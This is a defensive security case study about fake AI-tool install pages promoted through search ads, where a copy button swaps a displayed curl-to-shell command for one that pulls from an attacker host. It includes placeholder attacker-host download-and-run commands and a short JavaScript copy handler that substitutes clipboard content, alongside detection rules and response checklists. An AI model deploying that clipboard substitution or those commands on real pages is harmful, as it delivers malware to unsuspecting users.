A practical security case study about fake AI tool install pages, clipboard command substitution, and why copy-pasting terminal commands from search results has become a real workstation risk.
Introduction
This is not a Claude vulnerability.
It is not a story about "AI tools are dangerous" either.
It is about a much more ordinary problem:
developers are used to copying install commands from the browser into the terminal
Attackers are now abusing that habit.
The old phishing pattern was familiar: a fake login page, a malicious attachment, a suspicious document, a password reset email.
The newer developer-focused pattern looks different:
fake documentation
fake install page
fake copy button
malware instead of install.sh
The victim does not need to open a suspicious attachment.
They search for an AI development tool, click a sponsored result, land on a page that looks like documentation, copy a terminal command, and run it.
It feels like installing a normal CLI tool.
But it can be the start of a malware infection chain.
The attack pattern: InstallFix
Push Security described this pattern as InstallFix.
The idea is simple:
- An attacker clones an installation page for a popular developer tool.
- The page looks close enough to legitimate documentation.
- The install commands are modified.
- Traffic is driven through Google Ads or other malvertising channels.
- The user copies and runs the command manually.
- The "installer" executes attacker-controlled code.
This is related to ClickFix, but the pretext is different.
In ClickFix, the user is often tricked into "fixing" something: a CAPTCHA, a browser issue, a broken access flow, or a fake system error.
In InstallFix, nothing is broken.
The user already wants to install legitimate software.
That is what makes the attack so effective.
Why AI tools are a good lure
AI developer tooling is moving fast.
People are installing Claude Code, ChatGPT-related tools, Cursor extensions, MCP servers, local agents, CLI wrappers, browser extensions, desktop clients, and small automation packages around LLM workflows.
In many teams, this does not always go through a formal internal approval process.
The real workflow often looks like this:
a colleague mentions a tool
someone searches for the install guide
the first result looks right
they copy the command
they run it
For an attacker, this is almost perfect:
- the tool is popular and timely;
- users expect to see terminal commands;
- sponsored results can appear above organic results;
- documentation pages are easy to imitate;
- the install command can look normal;
- the user may be redirected to a real page afterward and notice nothing.
Kaspersky and Push Security have both described campaigns where fake install pages were promoted through search ads and imitated installation instructions for Claude Code or similar AI tooling.
The important point is this:
the lure is not the AI model itself
the lure is the developer installation workflow
A realistic case: installing Claude through install.sh
Imagine a developer wants to install an AI coding assistant.
They search for:
Claude Code install
At the top of the search results, they see a sponsored link.
The domain looks plausible:
claude-code-docs.example
claude-code-install.example
claude-update.example
The page looks like documentation:
- logo;
- sidebar;
- quickstart section;
- OS tabs for macOS, Linux, and Windows;
- a copy button;
- a short terminal command.
On the page, the visible command may look like this:
curl -fsSL https://claude.ai/install.sh | sh
But the visible command and the clipboard command do not have to be the same.
For example, the page can display:
curl -fsSL https://claude.ai/install.sh | sh
But after the user clicks Copy, the clipboard may contain:
curl -fsSL https://download.example.invalid/install.sh | sh
Or:
curl -fsSL https://download.example.invalid/bootstrap | sh
In a real campaign, the attacker domain would be more convincing.
The point is not the exact URL.
The point is that the user trusts the page UI instead of verifying the pasted command before pressing Enter.
Where JavaScript comes in
Most documentation pages show a command as text and provide a Copy button.
That button can copy a value that is different from the text the user sees.
Conceptually:
visible text:
curl -fsSL https://official.example/install.sh | sh
clipboard value:
curl -fsSL https://attacker.example/install.sh | sh
An attacker can make this more subtle:
- show a legitimate-looking domain in the page;
- copy an attacker-controlled URL into the clipboard;
- add base64 decoding;
- add silent flags;
- choose payloads based on OS;
- change the command only for selected geographies or organizations;
- change the copied command only when the visit comes from an ad campaign.
So "I saw the correct command on the page" is not enough.
The only thing that matters is what is actually pasted into the terminal.
That sounds basic.
But this is exactly the kind of basic thing that breaks under speed and trust.
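Conceptually, the substitution takes only a few lines of page script. This is a minimal sketch of a malicious copy handler; the attacker domain is a placeholder, and `clipboardData.setData` is the standard browser ClipboardEvent API:

```javascript
// What the page renders vs. what the clipboard receives.
const visibleCommand =
  "curl -fsSL https://claude.ai/install.sh | sh";
const clipboardCommand =
  "curl -fsSL https://attacker.example/install.sh | sh";

// A "copy" event listener can discard the selected text
// and substitute its own payload.
function onCopy(event) {
  event.preventDefault(); // drop what the user thinks they copied
  event.clipboardData.setData("text/plain", clipboardCommand);
}

// Browser-only wiring (not executed here):
// document.addEventListener("copy", onCopy);
```

The user sees `visibleCommand`; the terminal receives `clipboardCommand`. Nothing on the rendered page changes.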
Windows scenario: mshta and PowerShell
On Windows, these campaigns often use living-off-the-land binaries.
A simplified infection chain can look like this:
browser / user paste
-> PowerShell
-> mshta.exe
-> remote HTA or script
-> cmd.exe or PowerShell stager
-> fileless payload
-> persistence or credential theft
In campaigns around fake Claude Code installers, researchers observed patterns involving mshta.exe, PowerShell, staged execution, obfuscation, AMSI bypass attempts, browser data theft, and infostealer behavior.
The key point is that the victim does not need to download and double-click a suspicious setup.exe.
They can run one copied command, and that command can fetch the rest.
From a detection perspective, this may look less like "a malicious file from email" and more like user-driven terminal activity.
That is why behavior matters.
macOS and Linux scenario: curl-to-shell
On macOS and Linux, the familiar pattern is:
curl -fsSL https://example.com/install.sh | sh
or:
curl -fsSL https://example.com/install.sh | zsh
This is convenient.
That is exactly why it is dangerous.
The command means:
download a remote script and execute it immediately
If the domain is official and the script is expected, this is a common developer workflow.
If the domain is replaced, this becomes remote code execution performed by the user.
The problem is not curl.
The problem is that the trust boundary becomes:
I trust this web page and its copy button
That is a weak boundary.
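A stronger boundary is an explicit allowlist: before running a pasted command, extract the download host and check it against known-good sources. A minimal sketch; the allowlist entries and the single-URL regex are simplifying assumptions:

```javascript
// Hosts a team has approved as install sources (assumption for this sketch).
const APPROVED_HOSTS = new Set(["claude.ai", "nodejs.org", "brew.sh"]);

// Pull the first URL out of a pasted command, if any.
function downloadHost(command) {
  const match = command.match(/https?:\/\/[^\s"']+/);
  return match ? new URL(match[0]).hostname : null;
}

// A command is approved only if its download host is on the allowlist.
function isApprovedInstall(command) {
  const host = downloadHost(command);
  return host !== null && APPROVED_HOSTS.has(host);
}
```

With this check, the swapped command from the clipboard example above fails immediately, because `download.example.invalid` is not an approved host.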
Why sponsored search results make this worse
Many users still treat Google Ads as a sign of legitimacy.
The mental shortcut is:
if it is at the top of Google, it is probably fine
That is a dangerous shortcut.
Malvertising works because the user initiates the search. There is no phishing email. No strange attachment. No random message from a stranger.
The user wanted to install the tool.
So they are less suspicious.
This is especially risky in a corporate environment.
A developer workstation may contain:
- source code;
- SSH keys;
- browser sessions;
- password manager sessions;
- Git credentials;
- cloud CLI tokens;
- kubeconfig files;
- CI/CD access;
- internal documentation;
- VPN access.
An infostealer on that machine is not just "one infected laptop".
It can become an entry point into the organization.
How this differs from a classic fake installer
A classic fake installer looks like this:
download setup.exe
run installer
get malware
InstallFix is more subtle.
It abuses a normal developer habit:
documentation says copy this command
I copy the command
I run the command
For a developer, this does not feel like running a random executable.
It feels like installing a CLI tool from documentation.
That is why security awareness should not stop at:
do not open suspicious executables
It also needs to say:
terminal commands copied from the browser are code execution
What to check before running install commands
A practical checklist for users:
- Do not use sponsored results to install developer tools.
- Open official documentation from a known source.
- Check the domain inside the command, not only the browser address bar.
- After pasting, read the command before pressing Enter.
- Avoid curl | sh when you do not understand what will be downloaded.
- When possible, download the script first and inspect it:
curl -fsSL https://official.example/install.sh -o install.sh
less install.sh
sh install.sh
- Use a disposable VM or container for tools you do not trust yet.
- Do not test new AI tools on a workstation that holds production secrets.
This is not about paranoia.
It is about treating remote installation commands as code execution.
Because that is what they are.
What teams can do
Awareness alone is not enough.
I would add a few practical controls.
Maintain an approved tool list
Teams should know where approved developer tools come from.
Example:
Claude Code:
official docs: https://docs.anthropic.com/...
expected package: @anthropic-ai/claude-code
Node.js:
official site: https://nodejs.org/
internal mirror: https://nexus.example.com/...
Homebrew:
official site: https://brew.sh/
If someone finds an installation guide through a sponsored ad, that should be a reason to stop.
Provide internal installation docs
For common tools, internal documentation helps a lot.
It should answer:
- how to install the tool;
- which command is approved;
- which domain is expected;
- whether a hash or signature should be checked;
- where to ask for help if the install fails.
This matters especially for AI tools.
People will try them anyway.
If the company does not provide a safe path, employees will find an unsafe path.
Use DNS and web controls
Useful controls include blocking or flagging:
- newly registered domains;
- suspicious lookalike domains;
- known malicious domains;
- ad-delivered installer pages;
- direct access to suspicious payload hosts.
This will not stop every campaign.
Attackers rotate infrastructure quickly.
But it is still a useful layer.
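One cheap way to flag lookalike domains is an edit-distance check against protected brand labels. Real deployments use richer signals (registration age, TLD, ad provenance), so treat this as a sketch; the brand list is an assumption:

```javascript
// Classic Levenshtein distance via dynamic programming.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) =>
    Array.from({ length: b.length + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0))
  );
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,                                  // deletion
        dp[i][j - 1] + 1,                                  // insertion
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1) // substitution
      );
    }
  }
  return dp[a.length][b.length];
}

// Brand labels worth protecting (an assumption for this sketch).
const BRANDS = ["claude", "anthropic", "nodejs"];

// Flag labels within two edits of a brand; the exact brand name on an
// unexpected domain (distance 0) is also a lookalike signal.
function looksLikeBrand(label) {
  return BRANDS.some(b => editDistance(label.toLowerCase(), b) <= 2);
}
```

A label like "claudee" or "clauda" trips the check, while unrelated labels pass through.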
Endpoint detections
On Windows, I would monitor for patterns such as:
browser -> powershell
browser -> cmd
powershell -> mshta
mshta -> cmd
mshta -> powershell
PowerShell with encoded commands
PowerShell AMSI tampering
new scheduled task near install activity
unexpected outbound traffic from scripting hosts
On macOS and Linux:
shell spawned from browser-adjacent activity
curl or wget downloading scripts to /tmp
chmod +x on a fresh download
execution from /tmp
unexpected launch agents
unexpected shell profile modification
Context matters.
curl is not malware.
PowerShell is not malware.
But a browser-driven install flow, a suspicious domain, an obfuscated command, and persistence behavior together are a different story.
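The parent-child patterns above can be expressed as a small matching rule over process telemetry. The process names and event shape here are assumptions for illustration, not a real EDR schema:

```javascript
// Suspicious parent->child pairs from the patterns above
// (process names are assumed examples).
const SUSPICIOUS_PAIRS = new Set([
  "chrome.exe>powershell.exe",
  "chrome.exe>cmd.exe",
  "powershell.exe>mshta.exe",
  "mshta.exe>cmd.exe",
  "mshta.exe>powershell.exe",
]);

// events: [{ parent: "chrome.exe", child: "powershell.exe" }, ...]
// Returns only the events whose parent->child pair is on the watchlist.
function flagProcessEvents(events) {
  return events.filter(e =>
    SUSPICIOUS_PAIRS.has(`${e.parent.toLowerCase()}>${e.child.toLowerCase()}`)
  );
}
```

In practice such a rule is one input to a score alongside domain reputation and persistence signals, not a verdict on its own.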
Why AppSec and DevSecOps should care
At first glance, this looks like endpoint security and awareness.
But it matters for AppSec and DevSecOps too.
Developer workstations often have access to the software supply chain:
- Git repositories;
- package registries;
- container registries;
- CI/CD variables;
- deployment configuration;
- signing keys;
- cloud credentials;
- kubeconfig files.
If an infostealer gets browser sessions or local credentials, the next step can be a supply chain incident.
That is why Secure SDLC should include workstation and tooling hygiene:
- approved source lists for developer tools;
- no installation from sponsored results;
- internal installation guides;
- sandboxing for new AI tools;
- endpoint telemetry on developer machines;
- least-privilege developer tokens;
- short-lived credentials;
- separate production credentials;
- regular review of local secrets and kubeconfigs.
This is not about fighting Claude.
It is about developer workstation security.
Incident response checklist
If someone already ran a suspicious install command:
- Stop using the workstation.
- Isolate the endpoint from the network or through EDR.
- Preserve the command, URL, browser history, and time window.
- Review the process tree: browser, shell, PowerShell, mshta.exe, cmd.exe, curl, zsh.
- Check persistence: scheduled tasks, launch agents, startup items, shell profiles.
- Review outbound connections.
- Treat browser sessions and tokens as potentially compromised.
- Rotate credentials:
- Git;
- GitHub or GitLab;
- cloud;
- container registry;
- package registry;
- password manager session, if relevant.
- Review recent repository and CI/CD activity.
- Rebuild the workstation if cleanup confidence is low.
If this is an infostealer, deleting one file is not enough.
Credentials may already be gone.
What this does not solve
Checking install commands does not replace:
- endpoint protection;
- DNS filtering;
- secure web gateways;
- least privilege;
- credential rotation;
- EDR telemetry;
- software allowlisting;
- internal package mirrors;
- developer security training.
It solves one specific gap:
people should not blindly execute code from a page they reached through an ad
That gap is small, but it is real.
Closing
InstallFix is uncomfortable because it does not need a sophisticated exploit.
It abuses normal developer behavior.
We trained people to do this:
copy command from docs
paste into terminal
press Enter
Attackers replaced the docs.
Or the command.
Or the clipboard value.
That can be enough.
So the rule I use is simple:
an install command from the browser is code execution
Treat it like code:
- verify the source;
- verify the domain;
- read the command after pasting;
- do not trust sponsored results;
- do not run unknown install.sh scripts on workstations with secrets;
- provide an approved internal path for popular tools.
This is a small habit.
But it can be the difference between installing a developer tool and running an infostealer on a developer workstation.
References
- Push Security, InstallFix: https://pushsecurity.com/blog/installfix/
- Kaspersky, Malware disguised as AI agents: https://www.kaspersky.com/blog/fake-ai-agents-infostealers/55412/
- Graphika, Malicious Commands: Fake Claude Code & ChatGPT Installers: https://graphika.com/posts/malicious-commands-fake-claude-code-chatgpt-installers
- TechRepublic summary: https://www.techrepublic.com/article/news-fake-claude-code-install-pages-malware-windows-macos/